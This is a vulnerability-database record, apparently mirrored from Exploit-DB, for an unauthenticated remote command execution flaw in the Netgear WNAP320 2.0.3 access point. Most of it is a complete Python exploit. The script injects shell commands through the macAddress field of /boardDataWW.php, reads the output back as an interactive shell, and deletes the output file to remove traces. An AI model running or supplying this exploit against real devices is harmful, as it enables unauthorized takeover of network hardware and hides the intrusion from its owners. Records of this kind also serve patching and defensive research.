ID
VAR-E-202106-0127
EDB ID
50069
TITLE
Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated) - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated).. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | netgear | model: | wnap320 | scope: | eq | version: | 2.0.3 | Trust: 1.6 |
EXPLOIT
# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)
# Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# IoT Device: Netgear WNAP320 Access Point
# Version: WNAP320 Access Point Firmware v2.0.3
import requests
import sys
if(len(sys.argv) != 2):
print('Must specify the IP parameter')
print("eg: python3 wnap320_v2_0_3.py <IP>")
sys.exit(0)
host = sys.argv[1]
port = 80
cmd = ''
while(True):
cmd = input('Shell_CMD$ ')
#injecting system command part writing the command output to a output file
data = {
'macAddress' : '112233445566;' + cmd + ' > ./output #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
if(response.ok):
#read the command output result
url = 'http://' + host + '/output'
cmdOutput = requests.get(url)
print(cmdOutput.text)
#remove trace
cmd = 'rm ./output'
data = {
'macAddress' : '112233445566;' + cmd + ' #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
else:
print('[!] No response from the server.')
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'macAddress' Remote Code Execution (RCE) (Unauthenticated)
Trust: 1.6
CREDITS
Bryan Leong
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 50069 | Trust: 1.6 |
db: | EDBNET | id: | 104520 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/50069/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 50069 |
db: | EDBNET | id: | 104520 |
LAST UPDATE DATE
2022-07-27T09:49:05.455000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 50069 | date: | 2021-06-28T00:00:00 |
db: | EDBNET | id: | 104520 | date: | 2021-06-28T00:00:00 |